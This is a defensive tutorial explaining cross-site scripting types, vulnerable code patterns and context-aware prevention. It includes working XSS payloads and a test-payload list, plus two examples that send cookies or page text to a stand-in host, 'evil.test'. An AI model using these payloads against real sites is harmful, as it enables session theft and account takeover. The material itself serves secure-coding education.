Cross-site scripting, usually shortened to XSS, is one of those web security bugs that sounds old-school but still shows up everywhere. If you build web apps that display user-controlled content, you need to understand it. Not just the definition, but how it actually happens in real code.

The short version: XSS happens when an attacker gets your site to treat untrusted input as executable code in the browser. Usually that means JavaScript, but the real issue is broader than “someone injected a script tag.” The browser parses HTML, attributes, URLs, CSS, and script contexts differently, and if you put user data into the wrong place without the right protection, the attacker can make the page do things you never intended.

This tutorial walks through what XSS is, how it works, the main types, realistic examples, and how to prevent it without relying on wishful thinking.

What XSS actually means

The “cross-site” part of the name is a historical artifact. It’s really about injecting script into a trusted website so it runs in another user’s browser under that site’s origin.

That last part matters most.

If malicious JavaScript runs on example.com, the browser treats it like code from example.com. That means it may be able to:

  • read page content
  • make authenticated requests as the victim
  • perform actions in the app
  • steal non-HttpOnly tokens
  • keylog form input
  • rewrite the UI
  • exfiltrate sensitive data

A lot of people still think XSS is mostly about cookie theft. Sometimes it is, but modern XSS is often more about account takeover, API abuse, and in-browser fraud.

How XSS works at a high level

The attack flow is usually simple:

  1. The application accepts attacker-controlled input.
  2. That input is stored or reflected somewhere in the page.
  3. The browser interprets that data as code instead of plain text.
  4. The malicious code runs in the victim’s browser.

Here’s the key idea: the browser does not know your intentions. If you generate HTML like this:

<div>Welcome, USER_INPUT</div>

and USER_INPUT is:

<img src=x onerror=alert(1)>

the browser doesn’t think, “that was probably meant to be text.” It sees valid HTML and parses it as an image element with an event handler.

That’s XSS.

A first vulnerable example

Imagine a server-rendered page that greets a user based on a query parameter.

app.get('/search', (req, res) => {
  const q = req.query.q || '';
  res.send(`
    <html>
      <body>
        <h1>Search results</h1>
        <p>You searched for: ${q}</p>
      </body>
    </html>
  `);
});

Looks harmless. But if someone visits this URL:

/search?q=<script>alert('XSS')</script>

the response becomes:

<p>You searched for: <script>alert('XSS')</script></p>

The browser parses the script tag and executes it.

That’s a classic reflected XSS example: attacker input comes in with the request and gets reflected immediately in the response.

The three main types of XSS

1. Reflected XSS

Reflected XSS happens when malicious input is sent in a request and immediately rendered in the response.

Common sources:

  • search parameters
  • error messages
  • form fields echoed back after validation fails
  • URL fragments processed by client-side code

Typical attack pattern:

  • attacker crafts a malicious URL
  • victim clicks it
  • application reflects the payload into the page
  • browser executes it

Example payload:

https://example.com/search?q=<img src=x onerror=fetch('https://evil.test?c='+document.cookie)>

Reflected XSS often depends on social engineering because the victim has to click the link or submit the malicious input.
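To see how mechanically simple the reflection is, here’s a minimal sketch (the renderSearch helper is hypothetical, mirroring the vulnerable /search handler above) showing that plain string interpolation passes the payload through untouched:

```javascript
// Hypothetical render helper mirroring the vulnerable /search handler.
// It just interpolates the query value into HTML, with no escaping.
function renderSearch(q) {
  return `<p>You searched for: ${q}</p>`;
}

const payload = "<script>alert('XSS')</script>";
const html = renderSearch(payload);

// The payload survives verbatim, so a browser would parse it as a real script tag.
console.log(html.includes("<script>alert('XSS')</script>")); // true
```

Nothing in that code is exotic; the bug is simply that data and markup were concatenated without an encoding step.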

2. Stored XSS

Stored XSS is worse in many real-world cases. The attacker submits payloads that get saved somewhere, like a database, and later shown to other users.

Common storage points:

  • comments
  • forum posts
  • user profiles
  • support tickets
  • chat messages
  • admin dashboards showing logs or reports

Example vulnerable code:

app.post('/comments', (req, res) => {
  db.comments.insert({ text: req.body.comment });
  res.redirect('/post/123');
});

app.get('/post/123', async (req, res) => {
  const comments = await db.comments.find();
  const html = comments.map(c => `<li>${c.text}</li>`).join('');
  res.send(`<ul>${html}</ul>`);
});

If an attacker posts:

<script>fetch('https://evil.test/steal?d='+document.body.innerText)</script>

every visitor to that post may execute the payload.

Stored XSS is especially dangerous when low-privilege users can inject code that runs in the browsers of high-privilege users, such as moderators or admins.
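One way to close the hole in the rendering step above is to escape each comment at output time. A minimal sketch, assuming a basic escapeHtml helper (repeated inline here so the snippet is self-contained):

```javascript
// Minimal HTML-escaping helper covering the five significant characters.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Escape each stored comment as it is rendered, not when it is saved.
function renderComments(comments) {
  return `<ul>${comments.map(c => `<li>${escapeHtml(c.text)}</li>`).join('')}</ul>`;
}

const stored = [{ text: "<script>fetch('https://evil.test/steal')</script>" }];
console.log(renderComments(stored));
// → <ul><li>&lt;script&gt;fetch(&#39;https://evil.test/steal&#39;)&lt;/script&gt;</li></ul>
```

Escaping on output rather than on input matters: the same stored text might later go into an email, a JSON API, or a CSV export, each of which needs different handling.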

3. DOM-based XSS

DOM-based XSS happens entirely in the browser. The server might send a perfectly safe page, but client-side JavaScript reads untrusted data and writes it into a dangerous DOM sink.

Example:

const params = new URLSearchParams(location.search);
const name = params.get('name');
document.getElementById('output').innerHTML = `Hello ${name}`;

If the URL is:

/?name=<img src=x onerror=alert(1)>

then innerHTML turns attacker-controlled data into live HTML.

This is one of the most common modern XSS patterns because frontend apps do a lot of DOM manipulation, and developers often reach for innerHTML when they should use text-safe APIs.

Not all contexts are the same

This is where developers get burned. Escaping is not one universal thing. The right defense depends on where the data goes.

These are different contexts:

  • HTML element content
  • HTML attributes
  • JavaScript strings
  • CSS values
  • URL parameters

A payload that fails in one context may work in another.

Safe in HTML text, unsafe in attributes

Suppose you output user data here:

<div>${userInput}</div>

If properly HTML-escaped, that can be safe.

But now look at this:

<input value="${userInput}">

If you don’t escape quotes, an attacker can break out of the attribute:

" autofocus onfocus="alert(1)

Result:

<input value="" autofocus onfocus="alert(1)">

Now code executes when the field gets focus.
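A sketch of attribute-context escaping (the escapeAttr name is my own, not a standard API): always quote attribute values, and encode the characters that could terminate the quoted value so the breakout above fails:

```javascript
// Escape characters that can terminate a double-quoted HTML attribute.
function escapeAttr(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const payload = '" autofocus onfocus="alert(1)';
console.log(`<input value="${escapeAttr(payload)}">`);
// → <input value="&quot; autofocus onfocus=&quot;alert(1)">
```

With the quotes encoded, the attacker’s text stays inside the value attribute as inert data instead of becoming new attributes.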

Dangerous JavaScript context

This is a very common mistake:

<script>
  const username = '${userInput}';
</script>

If userInput contains:

'; alert(1); //

the output becomes:

<script>
  const username = ''; alert(1); //';
</script>

That executes immediately.

Putting untrusted data inside script blocks is dangerous unless you use proper JavaScript-aware encoding or safer patterns like JSON serialization.
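One such safer pattern is to serialize the value as JSON and neutralize "<" so the data can never close the script block early. A minimal sketch (the toScriptLiteral name is illustrative):

```javascript
// Serialize untrusted data for embedding inside a <script> block.
// JSON.stringify handles quotes and backslashes; escaping "<" prevents
// a "</script>" inside the data from terminating the block early.
function toScriptLiteral(value) {
  return JSON.stringify(value).replace(/</g, '\\u003c');
}

const userInput = "'; alert(1); //</script>";
console.log(`const username = ${toScriptLiteral(userInput)};`);
// → const username = "'; alert(1); //\u003c/script>";
```

The attacker’s quote and comment characters end up inside a properly delimited JavaScript string literal instead of being parsed as code.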

Real browser behavior attackers abuse

Attackers don’t need <script>alert(1)</script> specifically. There are lots of executable surfaces:

  • event handlers like onerror, onclick, onload
  • javascript: URLs
  • SVG content
  • malformed HTML that the browser repairs
  • DOM APIs like innerHTML, outerHTML, insertAdjacentHTML
  • template rendering bugs
  • unsafe markdown or rich text rendering

Example:

<div id="content"></div>
<script>
  const bio = new URLSearchParams(location.search).get('bio');
  document.getElementById('content').innerHTML = bio;
</script>

Payload:

<svg onload=alert(1)>

No script tag needed.

That’s why simplistic filters like “block the word script” are useless.
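To make that concrete, here’s a toy blocklist filter (purely illustrative; never do this) and a payload that sails straight through it:

```javascript
// A naive "security" filter that strips the word "script".
// Shown only to demonstrate why blocklists fail; do not use in real code.
function naiveFilter(input) {
  return input.replace(/script/gi, '');
}

const payload = '<svg onload=alert(1)>';
console.log(naiveFilter(payload));
// → <svg onload=alert(1)>   (unchanged: no "script" substring to strip)
```

The payload contains no blocked word, yet it executes in any browser that renders it, which is exactly the gap between filtering strings and controlling parsing contexts.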

How to prevent XSS properly

You prevent XSS by treating all untrusted data as data, not markup or code.

1. Escape output based on context

This is the core rule.

If you put untrusted input into HTML text, HTML-escape it. If you put it into an attribute, attribute-escape it. If you put it into JavaScript, use JavaScript-safe serialization. If you put it into a URL, URL-encode it.

Bad:

res.send(`<p>${comment}</p>`);

Better:

res.send(`<p>${escapeHtml(comment)}</p>`);

A minimal HTML escape function might look like:

function escapeHtml(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

That helps for HTML text content. But don’t pretend one helper solves every context. It doesn’t.

2. Use safe DOM APIs

On the frontend, prefer APIs that insert text, not HTML.

Unsafe:

element.innerHTML = userInput;

Safe:

element.textContent = userInput;

Unsafe:

element.insertAdjacentHTML('beforeend', userInput);

Safer pattern:

const div = document.createElement('div');
div.textContent = userInput;
element.appendChild(div);

If you truly need to allow limited HTML, use a sanitizer designed for that purpose.

3. Sanitize rich HTML when you must allow it

Sometimes users really do need formatting: bold text, links, lists, maybe images. In that case, escaping everything may not be acceptable. You need sanitization, meaning removing dangerous elements and attributes while keeping an allowed subset.

This is hard to do correctly by hand. Use a well-maintained HTML sanitizer, and don’t invent your own regex-based “filter”; homegrown regex sanitizers are almost always security theater.

4. Avoid inline JavaScript

This pattern is fragile:

<button onclick="save('${userInput}')">Save</button>

Safer approach:

<button id="saveBtn">Save</button>
<script>
  const value = USER_DATA_FROM_JSON;
  document.getElementById('saveBtn').addEventListener('click', () => {
    save(value);
  });
</script>

The more you separate data from code, the fewer weird parser edge cases you have to think about.

5. Use templating frameworks correctly

Modern frameworks help, but only if you stay on the paved road.

Generally safe by default:

  • React rendering values in JSX
  • Vue interpolations
  • server-side template engines with auto-escaping enabled

Generally dangerous escape hatches:

  • React dangerouslySetInnerHTML
  • Vue v-html
  • Angular’s bypassSecurityTrust APIs
  • disabling template auto-escaping
  • custom rendering helpers that concatenate raw HTML

Frameworks reduce XSS risk. They do not eliminate it.

6. Deploy Content Security Policy

CSP is not your primary fix, but it’s a powerful backup layer. A strong CSP can make many XSS payloads much harder to exploit by restricting script execution.

A basic example:

Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-random123';
  object-src 'none';
  base-uri 'self';

Best results come from nonce-based CSP and avoiding inline scripts. If your app depends on tons of inline JS and broad third-party script access, your CSP will end up too weak to help much.

7. Use HttpOnly cookies, but understand the limits

If session cookies are marked HttpOnly, JavaScript can’t read them directly. That’s good.

But XSS can still:

  • perform actions as the user
  • read sensitive page data
  • call same-origin APIs
  • change account settings
  • exfiltrate CSRF tokens from the DOM if exposed there

So yes, use HttpOnly cookies. No, they do not “solve” XSS.
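Setting the flag itself is trivial. For instance, building a raw Set-Cookie header value (the sessionCookie helper name is illustrative):

```javascript
// Build a session cookie that JavaScript cannot read (HttpOnly),
// travels only over HTTPS (Secure), and resists some CSRF vectors (SameSite).
function sessionCookie(sessionId) {
  return `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

console.log(sessionCookie('abc123'));
// → session=abc123; HttpOnly; Secure; SameSite=Lax; Path=/
```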

A secure rewrite of a vulnerable example

Vulnerable frontend code:

const name = new URLSearchParams(location.search).get('name');
document.getElementById('greeting').innerHTML = `Hello, ${name}`;

Safer version:

const name = new URLSearchParams(location.search).get('name') || 'guest';
document.getElementById('greeting').textContent = `Hello, ${name}`;

Vulnerable server-side rendering:

res.send(`<p>${req.body.message}</p>`);

Safer version:

res.send(`<p>${escapeHtml(req.body.message)}</p>`);

How to test for XSS

Start simple. Put payloads anywhere user input is rendered and see what happens.

Common test payloads:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
" onmouseover="alert(1)
';alert(1);//

Then inspect where your application puts that data:

  • HTML body?
  • attribute?
  • script block?
  • URL?
  • DOM insertion via JavaScript?

The payload needs to match the context.

Final thoughts

XSS is not just “someone put a script tag in a form.” It’s a browser parsing problem caused by mixing untrusted data with executable contexts.

The practical rule is simple:

  • escape by output context
  • use text-safe DOM APIs
  • sanitize allowed HTML with a real sanitizer
  • avoid inline script patterns
  • add CSP as defense in depth

If you remember one thing, make it this: input validation is not the main XSS defense. Output handling is. The vulnerability happens at the moment untrusted data is rendered into a context the browser can execute.

That’s where you win or lose.